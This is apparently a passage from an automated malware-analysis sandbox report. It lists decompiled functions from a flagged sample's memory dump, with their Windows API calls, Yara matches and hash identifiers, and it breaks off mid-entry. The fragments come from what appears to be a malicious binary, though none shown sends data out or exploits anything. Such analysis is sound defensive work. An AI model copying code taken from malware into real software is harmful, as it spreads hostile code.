                                            • String ID: &5A
                                            • API String ID: 2488874121-1617645808
                                            • Opcode ID: fcbf945e6328ea6c1887eb20fc2a2a2567de23908ff0df483301d651e10bb6be
                                            • Instruction ID: 6282274ab587063e124e8f6f94d4621d7c1d3b2a4779aafc1cb1d89d7c11a588
                                            • Opcode Fuzzy Hash: fcbf945e6328ea6c1887eb20fc2a2a2567de23908ff0df483301d651e10bb6be
                                            • Instruction Fuzzy Hash: FBF08CB52002086BD714EFA9EC89EE777ADEF88390F218559FD085B201C631E8408AF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 40%
                                            			E004188A0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t6 =  &_a8; // 0x413526
				_t12 =  *_t6;
				_push(_a16);
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}







                                            0x004188b7
                                            0x004188bf
                                            0x004188c2
                                            0x004188c2
                                            0x004188c8
                                            0x004188cb
                                            0x004188cd
                                            0x004188d1

                                            APIs
                                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: &5A
                                            • API String ID: 1279760036-1617645808
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041894D, Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E0041894D(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t20;

				asm("repe jnp 0x4f");
				asm("in al, 0x55");
				_t8 = _a4;
				_t3 = _t8 + 0xc74; // 0xc74
				E004191D0(_t20, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}





                                            0x004188da
                                            0x004188df
                                            0x004188e3
                                            0x004188ef
                                            0x004188f7
                                            0x0041890d
                                            0x00418911

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitFreeHeapProcess
                                            • String ID:
                                            • API String ID: 1180424539-0
                                            • Opcode ID: 638e98ca48876dcc6a2d4b4a75ca26f72c87f61d2700b5f618fbd2a0a80bd2e4
                                            • Instruction ID: ac497d262b34783e26b3ca760390965de9d836cbddb32587618383f770ce6fb2
                                            • Opcode Fuzzy Hash: 638e98ca48876dcc6a2d4b4a75ca26f72c87f61d2700b5f618fbd2a0a80bd2e4
                                            • Instruction Fuzzy Hash: 2EF0AFB12042047FD714DF64CC49FE73BA89F48350F144949FD595B242C531E911CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				L0041AD10( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (L00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                            0x00407280
                                            0x0040728f
                                            0x00407293
                                            0x0040729e
                                            0x004072ae
                                            0x004072be
                                            0x004072c3
                                            0x004072ca
                                            0x004072cd
                                            0x004072da
                                            0x004072dc
                                            0x004072de
                                            0x004072fb
                                            0x004072fb
                                            0x00000000
                                            0x004072fd
                                            0x00407302

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                            • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                            • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                            • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407253, Relevance: 1.5, APIs: 1, Instructions: 47threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: ae089018b483cc5af5b97608564573cf562c8fbf42ff24fac65e517310ac558a
                                            • Instruction ID: 19d6fb42efd6647f46ad17cc43e22d3cbf2539516a199e1ba29fc6e9581c60b3
                                            • Opcode Fuzzy Hash: ae089018b483cc5af5b97608564573cf562c8fbf42ff24fac65e517310ac558a
                                            • Instruction Fuzzy Hash: 2FF0F672B8021936E62165556C03FFE73589B40B51F1900BFFF04FB2C2FAA9AD4642E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x00418a5a
                                            0x00418a70
                                            0x00418a74

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x004188ef
                                            0x004188f7
                                            0x0041890d
                                            0x00418911

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418912, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 50%
                                            			E00418912() {
				int _v0;
				intOrPtr _v4;
				void* _t13;

				asm("pushad");
				_push(ss);
				_t6 = _v4;
				E004191D0(_t13, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}






                                            0x0041891a
                                            0x0041891d
                                            0x00418923
                                            0x0041893a
                                            0x00418948

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 22990e755b6d3975cbc62fea768f659959c1af4a0dcbfb079f9ec8e994eb6656
                                            • Instruction ID: c07516c4409d34d008ef245c5732bf97bb28f4cd06172ad6fb42449ff2e4143d
                                            • Opcode Fuzzy Hash: 22990e755b6d3975cbc62fea768f659959c1af4a0dcbfb079f9ec8e994eb6656
                                            • Instruction Fuzzy Hash: CFE04FB4610305BFD734DF64CC9AFD33BA99B096A0F048698B95927292D670EB50C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                            0x00418923
                                            0x0041893a
                                            0x00418948

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                            • Instruction ID: 7f541cce7341b726ca3189041fa932a6336af74422518780cffbe53c04ca977f
                                            • Opcode Fuzzy Hash: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                            • Instruction Fuzzy Hash: 06B092B29024D9CAEB11E7B05A08B2B7E00BBE0741F26C562E2020685B4779C4D1F6F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00406AB4, Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45cd188c90423a8ff0df6b6357dcb7c11e8f8b457759b234f3c04948392e3dec
                                            • Instruction ID: f8514cecbd4cc92bbf1bbe748015c6f87ef303c5aa5e8e30fe36f7e12e7b5e25
                                            • Opcode Fuzzy Hash: 45cd188c90423a8ff0df6b6357dcb7c11e8f8b457759b234f3c04948392e3dec
                                            • Instruction Fuzzy Hash: 98C01232A551158AD3300D1DA8A01B5F7B4A79A624F10677AD808EB991CB56D407518C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A098A0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                            • Instruction ID: a8cf857df87f6bd03865a0eb8afb916004f5972a04dd5b3f14e8d12fa6ce18cf
                                            • Opcode Fuzzy Hash: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                            • Instruction Fuzzy Hash: 4F90026130101402D202616944146460409D7D1385F91C422E1414555D86658993F1B2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09820, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                            • Instruction ID: 0b268831c4c1ab52680674bb3939a4bb22d2de30e32814bef46280208555ae7a
                                            • Opcode Fuzzy Hash: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                            • Instruction Fuzzy Hash: C890027124101402D241716944046460409A7D0381F91C422A0414554E86958A96FAE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A0B040, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                            • Instruction ID: acf0d5f479c79240ac9ac3f0f0c07aefe48256605cffbc211af4fdd1922508f2
                                            • Opcode Fuzzy Hash: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                            • Instruction Fuzzy Hash: 119002A1601150434640B16948044465415A7E1341391C531A0444560C86A88895E2E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A099D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                            • Instruction ID: a40fc812ad20c0d0bfccf7cd46ae6051b02e7a62ad9cbeb0bb490aa243aa8551
                                            • Opcode Fuzzy Hash: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                            • Instruction Fuzzy Hash: 9C9002A121101042D20461694404746044597E1341F51C422A2144554CC5698CA1A1A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09950, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                            • Instruction ID: 9d87ebb25f7e16c674cf0bdcc66ad79c6c983cba86160841acaefd05b65c1d6a
                                            • Opcode Fuzzy Hash: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                            • Instruction Fuzzy Hash: 329002A120141403D24065694804647040597D0342F51C421A2054555E8A698C91B1B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09A80, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                            • Instruction ID: f4c5860114ddf17f9db68ecdf7c04f689360a1830384660e23aad6d85af66e4b
                                            • Opcode Fuzzy Hash: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                            • Instruction Fuzzy Hash: 1F90026120145442D24062694804B4F450597E1342F91C429A4146554CC9558895A7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09A10, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                            • Instruction ID: f212c6223a443c7e31d175cbe2b1ac146a28fab09b18ce3e74788c09f461f788
                                            • Opcode Fuzzy Hash: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                            • Instruction Fuzzy Hash: 4590027120141402D20061694808787040597D0342F51C421A5154555E86A5C8D1B5B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A0A3B0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                            • Instruction ID: 35a2c4a2356be97c713b9b11c77802ac3579c4f72cf500f85071e0fb5cbe680b
                                            • Opcode Fuzzy Hash: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                            • Instruction Fuzzy Hash: 1990027120145002D2407169844464B5405A7E0341F51C821E0415554C86558896E2A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09B00, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                            • Instruction ID: d2fedbcecf7a950f5374f74c095b12ae17afb836810d99b7043c15328ee36e23
                                            • Opcode Fuzzy Hash: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                            • Instruction Fuzzy Hash: FB90026124101802D240716984147470406D7D0741F51C421A0014554D865689A5B6F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A095F0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                            • Instruction ID: e887574115e6291994776ade48fdfe3a4aa9aeef2f1fd83914d63565fb87ff4c
                                            • Opcode Fuzzy Hash: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                            • Instruction Fuzzy Hash: 3890027120101802D204616948046C6040597D0341F51C421A6014655E96A588D1B1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09520, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                            • Instruction ID: aa12941b71ce22c5ec157d25e5727ab8101b1e66847fe9b6ce386c495632ef30
                                            • Opcode Fuzzy Hash: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                            • Instruction Fuzzy Hash: 049002E1201150924600A2698404B4A490597E0341B51C426E1044560CC5658891E1B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A0AD30, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                            • Instruction ID: dcf145d2a0992ac5f6972e22c51be163b7bb9ad120272f0053a6651c5f78a39a
                                            • Opcode Fuzzy Hash: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                            • Instruction Fuzzy Hash: 3D900271A05010129240716948146864406A7E0781B55C421A0504554C89948A95A3E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09560, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                            • Instruction ID: 65897f1f7df915f69680ae797b9bea826366557d757b4b143bfcaf83edec5a20
                                            • Opcode Fuzzy Hash: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                            • Instruction Fuzzy Hash: C4900265221010020245A569060454B0845A7D6391391C425F1406590CC66188A5A3A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A096D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                            • Instruction ID: a6de25885d4ddb5bc7472cdb7a1e82fd784322be88a4c22f1469f4e8246c785f
                                            • Opcode Fuzzy Hash: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                            • Instruction Fuzzy Hash: CB90027120101842D20061694404B86040597E0341F51C426A0114654D8655C891B5A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09610, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                            • Instruction ID: 3aae62aa8c56198208e2baf391671b09e3792a5d2cc022712fd769eeda9bed22
                                            • Opcode Fuzzy Hash: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                            • Instruction Fuzzy Hash: 4690027160501802D25071694414786040597D0341F51C421A0014654D87958A95B6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09650, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                            • Instruction ID: ac43491b3d4451088206f3c0df52bd3e76dbb0b46fbd301310f6a850597c6de2
                                            • Opcode Fuzzy Hash: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                            • Instruction Fuzzy Hash: 7490027120505842D24071694404A86041597D0345F51C421A0054694D96658D95F6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09730, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                            • Instruction ID: 0447279c205caa384f4d89fc08c58219dd3feb71ae969dae4871b449b9b397d0
                                            • Opcode Fuzzy Hash: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                            • Instruction Fuzzy Hash: BA90026160501402D24071695418746041597D0341F51D421A0014554DC6998A95B6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A0A710, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                            • Instruction ID: 4f9cfaac5c4b9bc5f350f3032fa2162baaebd8ffb11511f72aef7ae4d89ae8fb
                                            • Opcode Fuzzy Hash: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                            • Instruction Fuzzy Hash: 05900271301010529600A6A95804A8A450597F0341B51D425A4004554C859488A1A1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09760, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                            • Instruction ID: 6161ed1c96c8455890c1f4271aa2edab8ebf969a51aa5f7db855893b9f930ef0
